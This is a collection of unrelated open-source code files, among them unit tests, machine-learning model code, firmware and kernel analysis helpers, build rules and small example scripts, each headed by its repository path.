'Content-Type': 'application/json',
'Accept': 'application/json',
'Authorization': 'Token ' + '<PASSWORD>'
}
def test_coach_end_user_command(requests_mock):
"""Unit test for coach-end-user command
Args:
requests_mock ([type]): [description]
"""
mock_reponse = RESPONSE_JSON
requests_mock.post(BASE_URL + URL_SUFFIX, json=mock_reponse)
client = SecurityAdvisor.Client(
base_url=BASE_URL,
verify=False,
proxy=False,
headers=HEADERS
)
args = {"user": "<EMAIL>", "context": "phishing"}
_, _, result = SecurityAdvisor.coach_end_user_command(client, args)
assert result == RESPONSE_JSON
def test_module_command(requests_mock):
"""Unit test for test-module command
Args:
requests_mock ([type]): [description]
"""
mock_reponse = RESPONSE_JSON
requests_mock.post(BASE_URL + URL_SUFFIX, json=mock_reponse)
client = SecurityAdvisor.Client(
base_url=BASE_URL,
verify=False,
proxy=False,
headers=HEADERS
)
response = SecurityAdvisor.test_module(client)
assert response == "ok"
|
python/py_gapic_repositories.bzl | vam-google/rules_gapic | 239 | 12799263 | <filename>python/py_gapic_repositories.bzl<gh_stars>100-1000
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
_BLACK_PY_BUILD_FILE = """
py_binary(
name = "black",
srcs = glob(["**/*.py"]),
visibility = ["//visibility:public"],
)
"""
def py_gapic_repositories():
_maybe(
http_archive,
name = "pypi_black",
strip_prefix = "black-19.3b0",
urls = ["https://files.pythonhosted.org/packages/89/07/aebb10fb8f2ffbac672dfbebffa724643bc84cf012a57737a622d1dabddb/black-19.3b0.tar.gz"],
build_file_content = _BLACK_PY_BUILD_FILE,
)
def _maybe(repo_rule, name, strip_repo_prefix = "", **kwargs):
if not name.startswith(strip_repo_prefix):
return
repo_name = name[len(strip_repo_prefix):]
if repo_name in native.existing_rules():
return
repo_rule(name = repo_name, **kwargs)
|
jsymbols.py | agnosticlines/ghidra_kernelcache | 238 | 12799275 | # Symbolicate the kernelcache from jtool2
#@author simo
#@category iOS.kernel
from utils.methods import *
if __name__ == "__main__":
default_file = "test"
fname = askString("Kernelcache symbol file","Symbol file: ",default_file)
f = open(fname,"rb+")
buf = f.read().split('\n')
i = 0
for line in buf:
if len(line) == 0:
continue
addr , symbol , empty = line.split("|")
if len(symbol) == 0:
continue
if "func_" in symbol:
continue
print addr,symbol
symbol = symbol.strip()#.replace(" ","_")
symbolicate(addr,symbol)
i+= 1
|
tools/get_efi_images.py | fengjixuchui/UEFI_RETool | 240 | 12799312 | <filename>tools/get_efi_images.py<gh_stars>100-1000
# SPDX-License-Identifier: MIT
import glob
import os
import pathlib
import re
import shutil
import colorama
import uefi_firmware
from .guid_db import UEFI_GUIDS
DIR_NAME = "all"
PE_DIR = "modules"
g_re_guid = re.compile(
r"file-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
)
class Dumper:
def __init__(self, fw_name, dir_name, pe_dir):
self.fw_name = fw_name
self.dir_name = dir_name
self.pe_dir = pe_dir
self.modules = list()
if not os.path.isdir(self.dir_name):
os.mkdir(self.dir_name)
if not os.path.isdir(self.pe_dir):
os.mkdir(self.pe_dir)
@staticmethod
def _unsupported() -> bool:
print("[-] This type of binary is not supported")
return False
def get_unique_name(self, module_name: str) -> str:
# Get unique name, see https://github.com/binarly-io/efiXplorer/issues/11
index = 1
unique_name = module_name
while True:
if unique_name in self.modules:
unique_name = f"{module_name}_{index:#d}"
index += 1
continue
return unique_name
def get_module_name(self, module_path: str) -> str:
module_name = str()
dir_name, _ = os.path.split(module_path)
template = os.path.join(dir_name, "*.ui")
if len(glob.glob(template)) == 1:
# try to get a friendly name from the *.ui file
ui_path = glob.glob(template)[0]
with open(ui_path, "rb") as f:
module_name = f.read()
module_name = module_name.decode("utf-16le")
module_name = self.get_unique_name(module_name[:-1])
self.modules.append(module_name)
return module_name
# no UI section, try to get a friendly name from the GUID database
file_guids = g_re_guid.findall(dir_name)
if not file_guids:
return str()
module_guid = file_guids[-1].replace("file-", "")
module_name = UEFI_GUIDS.get(module_guid.upper())
if not module_name:
module_name = module_guid
module_name = self.get_unique_name(module_name)
self.modules.append(module_name)
return module_name
@staticmethod
def search_pe(d: str) -> list:
return list(map(str, pathlib.Path(d).rglob("*.pe")))
@staticmethod
def search_te(d: str) -> list:
return list(map(str, pathlib.Path(d).rglob("*.te")))
def get_pe_files(self):
pe_files = self.search_pe(self.dir_name)
te_files = self.search_te(self.dir_name)
for module_path in te_files + pe_files:
module_name = self.get_module_name(module_path)
if not module_name:
print(f"Current module: unknown")
continue
print(f"Current module: {module_name}")
dst = os.path.join(self.pe_dir, module_name)
shutil.copy(module_path, dst)
def dump_all(self) -> bool:
if not os.path.isfile(self.fw_name):
print(f"[-] Check {self.fw_name} file")
return False
with open(self.fw_name, "rb") as fw:
file_content = fw.read()
parser = uefi_firmware.AutoParser(file_content)
if parser.type() is "unknown":
fvh_index = file_content.find(b"_FVH")
if fvh_index < 0:
return self._unsupported()
parser = uefi_firmware.AutoParser(file_content[fvh_index - 40 :])
if parser.type() is "unknown":
return self._unsupported()
firmware = parser.parse()
firmware.dump(self.dir_name)
return True
def get_efi_images(fw_name) -> bool:
"""get images from firmware"""
colorama.init(autoreset=True) # for correct color display in uefi_firmware module
dumper = Dumper(fw_name, DIR_NAME, PE_DIR)
if not dumper.dump_all():
exit()
dumper.get_pe_files()
return True
|
testYOLOv3.py | SuicideMonkey/Object-Detection-API-Tensorflow | 303 | 12799373 | <filename>testYOLOv3.py
import tensorflow as tf
import numpy as np
import os
import utils.tfrecord_voc_utils as voc_utils
import YOLOv3 as yolov3
# import matplotlib.pyplot as plt
# import matplotlib.patches as patches
# from skimage import io, transform
from utils.voc_classname_encoder import classname_to_ids
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
lr = 0.001
batch_size = 12
buffer_size = 256
epochs = 160
reduce_lr_epoch = []
config = {
'mode': 'train', # 'train', 'test'
'data_shape': [448, 448, 3],
'num_classes': 20,
'weight_decay': 5e-4,
'keep_prob': 0.5, # not used
'data_format': 'channels_last', # 'channels_last' 'channels_first'
'batch_size': batch_size,
'coord_scale': 1,
'noobj_scale': 1,
'obj_scale': 5.,
'class_scale': 1.,
'num_priors': 3,
'nms_score_threshold': 0.5,
'nms_max_boxes': 10,
'nms_iou_threshold': 0.5,
'priors': [[[10., 13.], [16, 30.], [33., 23.]],
[[30., 61.], [62., 45.], [59., 119.]],
[[116., 90.], [156., 198.], [373.,326.]]]
}
image_augmentor_config = {
'data_format': 'channels_last',
'output_shape': [448, 448],
# 'zoom_size': [520, 520],
# 'crop_method': 'random',
'flip_prob': [0., 0.5],
'fill_mode': 'BILINEAR',
'keep_aspect_ratios': False,
'constant_values': 0.,
# 'color_jitter_prob': 0.5,
# 'rotate': [0.5, -10., 10.],
'pad_truth_to': 60,
}
data = os.listdir('./voc2007/')
data = [os.path.join('./voc2007/', name) for name in data]
train_gen = voc_utils.get_generator(data,
batch_size, buffer_size, image_augmentor_config)
trainset_provider = {
'data_shape': [448, 448, 3],
'num_train': 5011,
'num_val': 0, # not used
'train_generator': train_gen,
'val_generator': None # not used
}
testnet = yolov3.YOLOv3(config, trainset_provider)
testnet.load_weight('./weight/test-40449')
for i in range(epochs):
print('-'*25, 'epoch', i, '-'*25)
if i in reduce_lr_epoch:
lr = lr/10.
print('reduce lr, lr=', lr, 'now')
mean_loss = testnet.train_one_epoch(lr)
print('>> mean loss', mean_loss)
testnet.save_weight('latest', './weight/test') # 'latest', 'best'
# img = io.imread()
# img = transform.resize(img, [448,448])
# img = np.expand_dims(img, 0)
# result = testnet.test_one_image(img)
# id_to_clasname = {k:v for (v,k) in classname_to_ids.items()}
# scores = result[0]
# bbox = result[1]
# class_id = result[2]
# print(scores, bbox, class_id)
# plt.figure(1)
# plt.imshow(np.squeeze(img))
# axis = plt.gca()
# for i in range(len(scores)):
# rect = patches.Rectangle((bbox[i][1],bbox[i][0]), bbox[i][3]-bbox[i][1],bbox[i][2]-bbox[i][0],linewidth=2,edgecolor='b',facecolor='none')
# axis.add_patch(rect)
# plt.text(bbox[i][1],bbox[i][0], id_to_clasname[class_id[i]]+str(' ')+str(scores[i]), color='red', fontsize=12)
# plt.show()
|
deepy/layers/word_embed.py | uaca/deepy | 260 | 12799377 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import theano
import theano.tensor as T
from deepy.layers import NeuralLayer
class WordEmbedding(NeuralLayer):
"""
Word embedding layer.
The word embeddings are randomly initialized, and are learned over the time.
"""
def __init__(self, size, vocab_size, zero_index=None, mask=None, load_values=None, init=None):
from deepy.core.neural_var import NeuralVariable
super(WordEmbedding, self).__init__("word_embed")
self.size = size
self.vocab_size = vocab_size
self.output_dim = size
self.zero_index = zero_index
self._mask = mask.tensor if type(mask) == NeuralVariable else mask
self._init = init
self._load_values = load_values
self.init(1)
def prepare(self):
if self._load_values is not None:
self.embed_matrix = theano.shared(self._load_values, name="embeddings")
else:
self.embed_matrix = self.create_weight(self.vocab_size, self.size, "embeddings", initializer=self._init)
self.register_parameters(self.embed_matrix)
def compute_tensor(self, x, mask=None):
mask = mask if mask else self._mask
if self.zero_index is not None:
mask = T.neq(x, self.zero_index)
# To avoid negative index
x = T.cast(x * mask, "int32")
if x.ndim == 1:
ret_tensor = self.embed_matrix[x]
else:
ret_tensor = self.embed_matrix[x.flatten()].reshape(list(x.shape) + [self.size])
if mask:
if x.ndim == 2:
ret_tensor *= mask[:, :, None]
elif x.ndim == 1:
ret_tensor *= mask[:, None]
return ret_tensor
|
tests/scripts/unicode💩.py | benfred/py-spy | 8,112 | 12799421 | <filename>tests/scripts/unicode💩.py<gh_stars>1000+
#!/env/bin/python
# -*- coding: utf-8 -*-
import time
def function1(seconds):
time.sleep(seconds)
if __name__ == "__main__":
function1(100)
|
mmdeploy/codebase/mmocr/models/text_recognition/sar_encoder.py | zhiqwang/mmdeploy | 746 | 12799438 | # Copyright (c) OpenMMLab. All rights reserved.
import mmocr.utils as utils
import torch
import torch.nn.functional as F
from mmdeploy.core import FUNCTION_REWRITER
@FUNCTION_REWRITER.register_rewriter(
func_name='mmocr.models.textrecog.encoders.SAREncoder.forward',
backend='default')
def sar_encoder__forward(ctx, self, feat, img_metas=None):
"""Rewrite `forward` of SAREncoder for default backend.
Rewrite this function to:
1. convert tuple value of feat.size to int, making model exportable.
2. use torch.ceil to replace original math.ceil and if else in mmocr.
Args:
ctx (ContextCaller): The context with additional information.
self: The instance of the class SAREncoder.
feat (Tensor): Encoded feature map of shape (N, C, H, W).
img_metas (Optional[list[dict]]): A list of image info dict where each
dict has: 'img_shape', 'scale_factor', 'flip', and may also contain
'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'.
For details on the values of these keys, see
:class:`mmdet.datasets.pipelines.Collect`.
Returns:
holistic_feat (Tensor): A feature map output from SAREncoder. The shape
[N, M].
"""
if img_metas is not None:
assert utils.is_type_list(img_metas, dict)
assert len(img_metas) == feat.size(0)
valid_ratios = None
if img_metas is not None:
valid_ratios = [
img_meta.get('valid_ratio', 1.0) for img_meta in img_metas
] if self.mask else None
h_feat = int(feat.size(2))
feat_v = F.max_pool2d(feat, kernel_size=(h_feat, 1), stride=1, padding=0)
feat_v = feat_v.squeeze(2) # bsz * C * W
feat_v = feat_v.permute(0, 2, 1).contiguous() # bsz * W * C
holistic_feat = self.rnn_encoder(feat_v)[0] # bsz * T * C
if valid_ratios is not None:
valid_hf = []
T = holistic_feat.size(1)
for i, valid_ratio in enumerate(valid_ratios):
# use torch.ceil to replace original math.ceil and if else in mmocr
valid_step = torch.ceil(T * valid_ratio).long() - 1
valid_hf.append(holistic_feat[i, valid_step, :])
valid_hf = torch.stack(valid_hf, dim=0)
else:
valid_hf = holistic_feat[:, -1, :] # bsz * C
holistic_feat = self.linear(valid_hf) # bsz * C
return holistic_feat
|
chronologer/vega.py | dandavison/chronologer | 165 | 12799453 | import json
import os
from jinja2 import Template
from chronologer.config import config
def write_html():
html_file = os.path.join(os.path.dirname(__file__), "templates", "index.html")
with open(html_file) as fp:
html_template = Template(fp.read())
if not config.dry_run:
boxplot_spec = json.dumps(_get_boxplot_spec(), indent=2)
with open(config.html_output_file, "w") as fp:
fp.write(html_template.render(boxplot_spec=boxplot_spec))
def _get_boxplot_spec():
with open(config.combined_benchmark_file) as fp:
values = json.load(fp)
return {
"$schema": "https://vega.github.io/schema/vega-lite/v3.json",
"data": {"values": values},
"mark": {"type": "boxplot", "extent": "min-max", "size": 5},
"width": 1400,
"height": 500,
"encoding": {
"y": {"field": "time", "type": "quantitative", "axis": {"title": "Time"}},
"x": {
"field": "commit",
"type": "ordinal",
"axis": {"title": "Commit", "labels": False, "ticks": False},
},
"tooltip": {"field": "message", "type": "ordinal", "aggregate": "min"},
},
}
|
src/googleapis/codegen/filesys/package_writer_foundry.py | aiuto/google-apis-client-generator | 178 | 12799463 | <reponame>aiuto/google-apis-client-generator
#!/usr/bin/python2.7
"""Foundary for getting a package writer."""
from googleapis.codegen.filesys import filesystem_library_package
from googleapis.codegen.filesys import single_file_library_package
from googleapis.codegen.filesys import tar_library_package
from googleapis.codegen.filesys import zip_library_package
def GetPackageWriter(output_dir=None, output_file=None, output_format='zip'):
"""Get an output writer for a package."""
if not (output_dir or output_file):
raise ValueError(
'GetPackageWriter requires either output_dir or output_file')
if output_dir and output_file:
raise ValueError(
'GetPackageWriter requires only one of output_dir or output_file')
if output_dir:
package_writer = filesystem_library_package.FilesystemLibraryPackage(
output_dir)
else:
out = open(output_file, 'w')
if output_format == 'tgz':
package_writer = tar_library_package.TarLibraryPackage(out)
elif output_format == 'tar':
package_writer = tar_library_package.TarLibraryPackage(out,
compress=False)
elif output_format == 'txt':
package_writer = single_file_library_package.SingleFileLibraryPackage(out)
else:
package_writer = zip_library_package.ZipLibraryPackage(out)
return package_writer
|
bindings/python/examples/mouse_game.py | augustye/muniverse | 380 | 12799492 | <filename>bindings/python/examples/mouse_game.py
"""
Simple program to demonstrate how to use muniverse on a
game that takes mouse events.
"""
import sys
import numpy as np
sys.path.insert(0, '..')
import muniverse # noqa: E402
def main():
print('Looking up environment...')
spec = muniverse.spec_for_name('TowerMania-v1')
print('Creating environment...')
env = muniverse.Env(spec)
try:
print('Resetting environment...')
env.reset()
print('Getting observation...')
obs = env.observe()
print(ascii_art(obs))
print('Playing game...')
step_idx = 0
action = muniverse.MouseAction('mousePressed', x=100, y=100, click_count=1)
actions = [action, action.with_event('mouseReleased')]
while True:
reward, done = env.step(0.1, actions[step_idx % 2])
step_idx += 1
print('reward: ' + str(reward))
if done:
break
finally:
env.close()
def ascii_art(img):
brightness = np.sum(img, axis=2) / 3
downsampled = brightness[::14, ::7]
binary = downsampled > 128
height, width = binary.shape
res = ''
for y in range(0, height):
if res != '':
res += '\n'
for x in range(0, width):
if binary[y, x]:
res += 'X'
else:
res += ' '
return res
if __name__ == '__main__':
main()
|
pyani/aniblastall.py | widdowquinn/pyani | 144 | 12799493 | # -*- coding: utf-8 -*-
# (c) University of Strathclyde 2021
# Author: <NAME>
#
# Contact: <EMAIL>
#
# <NAME>,
# Strathclyde Institute for Pharmacy and Biomedical Sciences,
# Cathedral Street,
# Glasgow,
# G4 0RE
# Scotland,
# UK
#
# The MIT License
#
# Copyright (c) 2021 University of Strathclyde
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Code to implement the ANIblastall average nucleotide identity method."""
import logging
import os
import platform
import re
import shutil
import subprocess
from pathlib import Path
from . import pyani_config
from . import PyaniException
class PyaniblastallException(PyaniException):
"""ANIblastall-specific exception for pyani."""
def get_version(blast_exe: Path = pyani_config.BLASTALL_DEFAULT) -> str:
r"""Return BLAST blastall version as a string.
:param blast_exe: path to blastall executable
We expect blastall to return a string as, for example
.. code-block:: bash
$ blastall -version
[blastall 2.2.26] ERROR: Number of database sequences to show \
one-line descriptions for (V) [ersion] is bad or out of range [? to ?]
This is concatenated with the OS name.
The following circumstances are explicitly reported as strings
- no executable at passed path
- non-executable file at passed path (this includes cases where the user doesn't have execute permissions on the file)
- no version info returned
- executable cannot be run on this OS
"""
logger = logging.getLogger(__name__)
try:
blastall_path = Path(shutil.which(blast_exe)) # type:ignore
except TypeError:
return f"{blast_exe} is not found in $PATH"
if not blastall_path.is_file(): # no executable
return f"No blastall at {blastall_path}"
# This should catch cases when the file can't be executed by the user
if not os.access(blastall_path, os.X_OK): # file exists but not executable
return f"blastall exists at {blastall_path} but not executable"
if platform.system() == "Darwin":
cmdline = [blast_exe, "-version"]
else:
cmdline = [blast_exe]
try:
result = subprocess.run(
cmdline, # type: ignore
shell=False,
stdout=subprocess.PIPE, # type: ignore
stderr=subprocess.PIPE,
check=False, # blastall doesn't return 0
)
except OSError:
logger.warning("blastall executable will not run", exc_info=True)
return f"blastall exists at {blastall_path} but could not be executed"
version = re.search( # type: ignore
r"(?<=blastall\s)[0-9\.]*", str(result.stderr, "utf-8")
).group()
if 0 == len(version.strip()):
return f"blastall exists at {blastall_path} but could not retrieve version"
return f"{platform.system()}_{version} ({blastall_path})"
|
vespene/migrations/0009_remove_workerpool_sudo_password.py | vespene-io/vespene | 680 | 12799528 | # Generated by Django 2.1.2 on 2018-12-16 13:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('vespene', '0008_auto_20181106_2233'),
]
operations = [
migrations.RemoveField(
model_name='workerpool',
name='sudo_password',
),
]
|
doc/autosar4_api/examples/create_composition_component.py | SHolzmann/autosar | 199 | 12799544 | import autosar
ws = autosar.workspace("4.2.2")
components = ws.createPackage("ComponentTypes")
swc = components.createCompositionComponent("MyComposition")
print(swc.name)
|
tests/test_actions.py | pauloromeira/onegram | 150 | 12799577 | import pytest
from onegram.exceptions import NotSupportedError
from onegram import follow, unfollow
from onegram import like, unlike
from onegram import comment, uncomment
from onegram import save, unsave
def test_follow(logged, user, cassette):
if logged:
response = follow(user)
assert response == {'result': 'following',
'status': 'ok',
'user_id': user['id']}
response = unfollow(user)
assert response == {'status': 'ok', 'user_id': user['id']}
else:
with pytest.raises(NotSupportedError):
follow(user)
with pytest.raises(NotSupportedError):
unfollow(user)
def test_like(logged, post, cassette):
if logged:
response = like(post)
assert response == {'status': 'ok', 'post_id': post['id']}
response = unlike(post)
assert response == {'status': 'ok', 'post_id': post['id']}
else:
with pytest.raises(NotSupportedError):
like(post)
with pytest.raises(NotSupportedError):
unlike(post)
def test_comment(logged, post, cassette):
text = 'awesome!'
if logged:
commentary = comment(text, post)
assert commentary['id']
assert commentary['text'] == text
assert commentary['status'] == 'ok'
assert commentary['post_id'] == post['id']
response = uncomment(commentary)
assert response == {'status': 'ok', 'post_id': post['id']}
else:
with pytest.raises(NotSupportedError):
comment(text, post)
with pytest.raises(NotSupportedError):
fake_comment = {'id': '1', 'post_id': '2'}
uncomment(fake_comment)
def test_save(logged, post, cassette):
if logged:
response = save(post)
assert response == {'status': 'ok', 'post_id': post['id']}
response = unsave(post)
assert response == {'status': 'ok', 'post_id': post['id']}
else:
with pytest.raises(NotSupportedError):
save(post)
with pytest.raises(NotSupportedError):
unsave(post)
|
tests/unittest/test_autograd.py | yuhonghong66/minpy | 1,271 | 12799585 | from __future__ import print_function
import minpy.numpy as mp
import numpy as np
import minpy.dispatch.policy as policy
from minpy.core import convert_args, return_numpy, grad_and_loss, grad, minpy_to_numpy as mn, numpy_to_minpy as nm
import time
# mp.set_policy(policy.OnlyNumPyPolicy())
def test_autograd():
@convert_args
def minpy_rnn_step_forward(x, prev_h, Wx, Wh, b):
next_h = mp.tanh(x.dot(Wx) + prev_h.dot(Wh) + b)
return next_h
def rel_error(x, y):
""" returns relative error """
return np.max(np.abs(x - y) / (np.maximum(1e-8, np.abs(x) + np.abs(y))))
def rnn_step_forward(x, prev_h, Wx, Wh, b):
next_h = np.tanh(prev_h.dot(Wh) + x.dot(Wx) + b)
cache = next_h, prev_h, x, Wx, Wh
return next_h, cache
def rnn_step_backward(dnext_h, cache):
dx, dprev_h, dWx, dWh, db = None, None, None, None, None
# Load values from rnn_step_forward
next_h, prev_h, x, Wx, Wh = cache
# Gradients of loss wrt tanh
dtanh = dnext_h * (1 - next_h * next_h) # (N, H)
# Gradients of loss wrt x
dx = dtanh.dot(Wx.T)
# Gradients of loss wrt prev_h
dprev_h = dtanh.dot(Wh.T)
# Gradients of loss wrt Wx
dWx = x.T.dot(dtanh) # (D, H)
# Gradients of loss wrt Wh
dWh = prev_h.T.dot(dtanh)
# Gradients of loss wrt b. Note we broadcast b in practice. Thus result of
# matrix ops are just sum over columns
db = dtanh.sum(axis=0) # == np.ones([N, 1]).T.dot(dtanh)[0, :]
return dx, dprev_h, dWx, dWh, db
# preparation
N, D, H = 4, 5, 6
x = np.random.randn(N, D)
h = np.random.randn(N, H)
Wx = np.random.randn(D, H)
Wh = np.random.randn(H, H)
b = np.random.randn(H)
out, cache = rnn_step_forward(x, h, Wx, Wh, b)
dnext_h = np.random.randn(*out.shape)
# test MinPy
start = time.time()
rnn_step_forward_loss = lambda x, h, Wx, Wh, b, dnext_h: minpy_rnn_step_forward(x, h, Wx, Wh, b) * nm(dnext_h)
grad_loss_function = return_numpy(grad_and_loss(rnn_step_forward_loss, range(5)))
grad_arrays = grad_loss_function(x, h, Wx, Wh, b, dnext_h)[0]
end = time.time()
print("MinPy total time elapsed:", end - start)
# test NumPy
start = time.time()
out, cache = rnn_step_forward(x, h, Wx, Wh, b)
dx, dprev_h, dWx, dWh, db = rnn_step_backward(dnext_h, cache)
out *= dnext_h # to agree with MinPy calculation
end = time.time()
print("NumPy total time elapsed:", end - start)
print()
print("Result Check:")
print('dx error: ', rel_error(dx, grad_arrays[0]))
print('dprev_h error: ', rel_error(dprev_h, grad_arrays[1]))
print('dWx error: ', rel_error(dWx, grad_arrays[2]))
print('dWh error: ', rel_error(dWh, grad_arrays[3]))
print('db error: ', rel_error(db, grad_arrays[4]))
def test_zero_input_grad():
def foo1(x):
return 1
bar1 = grad(foo1)
assert bar1(0) == 0.0
def test_reduction():
def test_sum():
x_np = np.array([[1, 2], [3, 4], [5, 6]])
x_grad = np.array([[1, 1], [1, 1], [1, 1]])
def red1(x):
return mp.sum(x)
def red2(x):
return mp.sum(x, axis=0)
def red3(x):
return mp.sum(x, axis=0, keepdims=True)
grad1 = grad(red1)
assert np.all(grad1(x_np).asnumpy() == x_grad)
grad2 = grad(red2)
assert np.all(grad2(x_np).asnumpy() == x_grad)
grad3 = grad(red3)
assert np.all(grad3(x_np).asnumpy() == x_grad)
def test_max():
x_np = np.array([[1, 2], [2, 1], [0, 0]])
x_grad1 = np.array([[0, 1], [1, 0], [0, 0]])
x_grad2 = np.array([[0, 1], [1, 0], [1, 1]])
x_grad3 = np.array([[0, 1], [1, 0], [0, 0]])
def red1(x):
return mp.max(x)
def red2(x):
return mp.max(x, axis=1)
def red3(x):
return mp.max(x, axis=1, keepdims=True)
def red4(x):
return mp.max(x, axis=0)
def red5(x):
return mp.max(x, axis=0, keepdims=True)
grad1 = grad(red1)
assert np.all(grad1(x_np).asnumpy() == x_grad1)
grad2 = grad(red2)
assert np.all(grad2(x_np).asnumpy() == x_grad2)
grad3 = grad(red3)
assert np.all(grad3(x_np).asnumpy() == x_grad2)
grad4 = grad(red4)
assert np.all(grad4(x_np).asnumpy() == x_grad3)
grad5 = grad(red5)
assert np.all(grad5(x_np).asnumpy() == x_grad3)
def test_min():
x_np = np.array([[1, 2], [2, 1], [0, 0]])
x_grad1 = np.array([[0, 0], [0, 0], [1, 1]])
x_grad2 = np.array([[1, 0], [0, 1], [1, 1]])
x_grad3 = np.array([[0, 0], [0, 0], [1, 1]])
def red1(x):
return mp.min(x)
def red2(x):
return mp.min(x, axis=1)
def red3(x):
return mp.min(x, axis=1, keepdims=True)
def red4(x):
return mp.min(x, axis=0)
def red5(x):
return mp.min(x, axis=0, keepdims=True)
grad1 = grad(red1)
assert np.all(grad1(x_np).asnumpy() == x_grad1)
grad2 = grad(red2)
assert np.all(grad2(x_np).asnumpy() == x_grad2)
grad3 = grad(red3)
assert np.all(grad3(x_np).asnumpy() == x_grad2)
grad4 = grad(red4)
assert np.all(grad4(x_np).asnumpy() == x_grad3)
grad5 = grad(red5)
assert np.all(grad5(x_np).asnumpy() == x_grad3)
test_sum()
test_max()
test_min()
if __name__ == "__main__":
test_autograd()
test_zero_input_grad()
test_reduction()
|
pymoo/model/repair.py | gabicavalcante/pymoo | 762 | 12799621 | <filename>pymoo/model/repair.py
from abc import abstractmethod
class Repair:
"""
This class is allows to repair individuals after crossover if necessary.
"""
def do(self, problem, pop, **kwargs):
return self._do(problem, pop, **kwargs)
@abstractmethod
def _do(self, problem, pop, **kwargs):
pass
class NoRepair(Repair):
"""
A dummy class which can be used to simply do no repair.
"""
def do(self, problem, pop, **kwargs):
return pop |
recipes/Python/543261_grade_keeper/recipe-543261.py | tdiprima/code | 2,023 | 12799634 | #! /usr/bin/python
# keep record of grades. Made by <NAME>. 0.1-PUBLIC
# NOTE! All letter answers are to be written in quotes (including dates)!
print """############################################
# Welcome to Gradebook! v 0.1 #
# YOUR LIGHT WEIGHT SCHOOL RECORD MANAGER! #
############################################"""
subject = raw_input("What is your assignment's subject? ")
# ^^This asks your class subject; assigns it to 'subject'; and is used later.
date = input('What is the date for your assignment? ')
# ^^This is pretty much the same: but asks the date.
amount = input('What is the number of questions? (NOTE: make all #s from now decimals. e.g.: "5.0" ')
# ^^^This is also the same, but make the number a DECIMAL!
correct = input('How many questions did you get correct? ')
# ^^^The same... make all DECIMALS!
calc = divmod(correct, amount)
# This is a nice homework trick. Divides correct by amount, assigns to 'calc'
calcx = (correct / amount)
# divides correct by amount; assigns to 'calcx'
text = "***%s*** \n %s | %d out of %d | %s or %s \n" % (date, subject, correct, amount, calc, calcx)
# creates what will be in your file. assigns to 'text'
print text
# prints what it will put in your file (or append).
fle = raw_input('What should I name the file to put the above data into? ')
# prompts for a filename
A = input('Do you want this to be appended to an existing file? ')
# decides to either append,or to create new file. assigns answer to 'A'
print 'Thanks! appending to file... '
if A is 'yes': #if you answered yes:
fyl = open(fle, 'a')
# the phrase 'fyl' is used to combine open('fle, 'a') with future commands
fyl.write(text)
# the command assigned to 'fyl' writes your data to the filename you said.
fyl.close()
# closes the file; job is done.
elif A is 'no': # if you said no, this will happen:
fyl = open(fle, 'w')
# same as before, but saves the file (see the 'w' instead of 'a'?)
fyl.write(text)
# same
fyl.close()
# same
else: # and if nothing was valid...
print 'Error! Invalid transaction! '
# ...error message!
print 'Done!'
# says it is done
raw_input("Press <RETURN> to quit.")
# makes you type <enter> to quit.
|
mcpipy/dragoncurve.py | wangtt03/raspberryjammod | 338 | 12799657 | #
# Code by <NAME> and under the MIT license
#
from mineturtle import *
import lsystem
t = Turtle()
t.pendelay(0)
t.turtle(None)
t.penblock(block.BRICK_BLOCK)
# ensure angles are always integral multiples of 90 degrees
t.gridalign()
rules = {'X':'X+YF+', 'Y':'-FX-Y'}
def go():
# draw a wall segment with a door
t.pendown()
t.penblock(block.BRICK_BLOCK)
t.startface()
for i in range(4):
t.go(4)
t.pitch(90)
t.endface()
t.penup()
t.go(2)
t.pendown()
t.penblock(block.AIR)
t.pitch(90)
t.go(1)
t.penup()
t.pitch(180)
t.go(1)
t.pitch(90)
t.go(2)
dictionary = { '+': lambda: t.yaw(90),
'-': lambda: t.yaw(-90),
'F': lambda: go() }
lsystem.lsystem('FX', rules, dictionary, 14)
|
test/run/t418.py | timmartin/skulpt | 2,671 | 12799678 | # lists
print "\nlists"
print min([1,2,3,4])
print min([2,1],[1,2],[1,1],[1,1,0])
# tuples
print "\ntuples"
print min((1,2,3,4))
print min((2,1),(1,2),(1,1),(1,1,0))
# dictionaries
print "\ndictionaries"
print min({1:2,3:4,5:6})
print min({1:6,3:4,5:2})
|
kvs/client/python/setup.py | saurav-c/fluent | 1,164 | 12799755 | <gh_stars>1000+
from distutils.core import setup
import os
from setuptools.command.install import install
class InstallWrapper(install):
def run(self):
# compile the relevant protobufs
self.compile_proto()
# Run the standard PyPi copy
install.run(self)
# remove the compiled protobufs
self.cleanup()
def compile_proto(self):
# compile the protobufs
os.system('cd anna && protoc -I=../../../../include/proto --python_out=. ' +
'kvs.proto')
os.system('cd anna && protoc -I=../../../../include/proto --python_out=. ' +
'functions.proto')
def cleanup(self):
os.system('rm anna/kvs_pb2.py')
setup(
name='Anna',
version='0.1',
